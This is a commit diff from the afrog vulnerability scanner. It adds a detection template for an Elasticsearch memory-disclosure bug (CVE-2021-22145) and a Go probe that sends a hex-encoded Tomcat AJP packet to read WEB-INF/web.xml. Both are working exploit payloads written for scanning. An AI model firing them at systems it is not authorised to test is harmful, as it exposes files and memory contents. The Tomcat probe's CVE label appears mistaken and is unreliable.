crash.software
Projects
Pull Requests
Issues
Builds
afrog
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY afrog Commits 58055635
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/CVE/2021/CVE-2021-22145.yaml
     1 +id: CVE-2021-22145
     2 + 
     3 +info:
     4 + name: ElasticSearch 7.13.3 - Memory disclosure
     5 + author: dhiyaneshDk
     6 + severity: medium
     7 + description: |
     8 + A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
     9 + ElasticSearch && port="9200"
     10 + reference:
     11 + - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-22145
     13 + - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
     14 + - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177
     15 + 
     16 +rules:
     17 + r0:
     18 + request:
     19 + method: POST
     20 + path: /_bulk
     21 + headers:
     22 + Content-Type: application/json
     23 + body: |
     24 + @
     25 + expression: response.status >= 400 && response.content_type.contains("application/json") && response.body.bcontains(b'"root_cause":') && response.body.bcontains(b'"reason":')
     26 +expression: r0()
  • ■ ■ ■ ■ ■ ■
    pkg/gopoc/tomcat.go
     1 +package gopoc
     2 + 
     3 +import (
     4 + "bytes"
     5 + "errors"
     6 + 
     7 + "github.com/zan8in/afrog/pkg/poc"
     8 + "github.com/zan8in/afrog/pkg/proto"
     9 + "github.com/zan8in/afrog/pkg/utils"
     10 +)
     11 + 
     12 +var (
     13 + tomcatAjpPort = "8009"
     14 + tomcatAjpUnAuthName = "CVE-2020-1928"
     15 +)
     16 + 
     17 +func tomcatAjpUnAuth(args *GoPocArgs) (Result, error) {
     18 + poc := poc.Poc{
     19 + Id: tomcatAjpUnAuthName,
     20 + Info: poc.Info{
     21 + Name: "Apache Tomcat AJP 文件读取与包含漏洞",
     22 + Author: "zan8in",
     23 + Severity: "high",
     24 + Description: "Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行。",
     25 + Reference: []string{
     26 + "https://blog.csdn.net/qq_44159028/article/details/112507136",
     27 + },
     28 + },
     29 + }
     30 + args.SetPocInfo(poc)
     31 + result := Result{Gpa: args, IsVul: false}
     32 + 
     33 + if len(args.Host) == 0 {
     34 + return result, errors.New("no host")
     35 + }
     36 + 
     37 + addr := args.Host + ":" + tomcatAjpPort
     38 + payload := []byte("1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff")
     39 + 
     40 + resp, err := utils.Tcp(addr, utils.HexDecode(string(payload)))
     41 + if err != nil {
     42 + return result, err
     43 + }
     44 + 
     45 + if bytes.Contains(resp, []byte("Licensed to the Apache Software Foundation")) {
     46 + result.IsVul = true
     47 + url := proto.UrlType{Host: addr, Port: tomcatAjpPort}
     48 + result.SetAllPocResult(true, &url, utils.HexDecode(string(payload)), resp)
     49 + return result, nil
     50 + }
     51 + 
     52 + return result, errors.New("check result: no vul")
     53 +}
     54 + 
     55 +func init() {
     56 + GoPocRegister(tomcatAjpUnAuthName, tomcatAjpUnAuth)
     57 +}
     58 + 
  • ■ ■ ■ ■ ■ ■
    pkg/utils/utils.go
    1 1  package utils
    2 2   
    3 3  import (
     4 + "encoding/hex"
    4 5   "io/ioutil"
     6 + "log"
    5 7   "net/http"
    6 8   "net/url"
    7 9   "os"
    skipped 165 lines
    173 175   return num
    174 176  }
    175 177   
     178 +//16进制解码
     179 +func HexDecode(s string) []byte {
     180 + dst := make([]byte, hex.DecodedLen(len(s))) //申请一个切片, 指明大小. 必须使用hex.DecodedLen
     181 + n, err := hex.Decode(dst, []byte(s)) //进制转换, src->dst
     182 + if err != nil {
     183 + log.Fatal(err)
     184 + return nil
     185 + }
     186 + return dst[:n] //返回0:n的数据.
     187 +}
     188 + 
     189 +//字符串转为16进制
     190 +func HexEncode(s string) []byte {
     191 + dst := make([]byte, hex.EncodedLen(len(s))) //申请一个切片, 指明大小. 必须使用hex.EncodedLen
     192 + n := hex.Encode(dst, []byte(s)) //字节流转化成16进制
     193 + return dst[:n]
     194 +}
     195 + 
Please wait...
Page is in error, reload to recover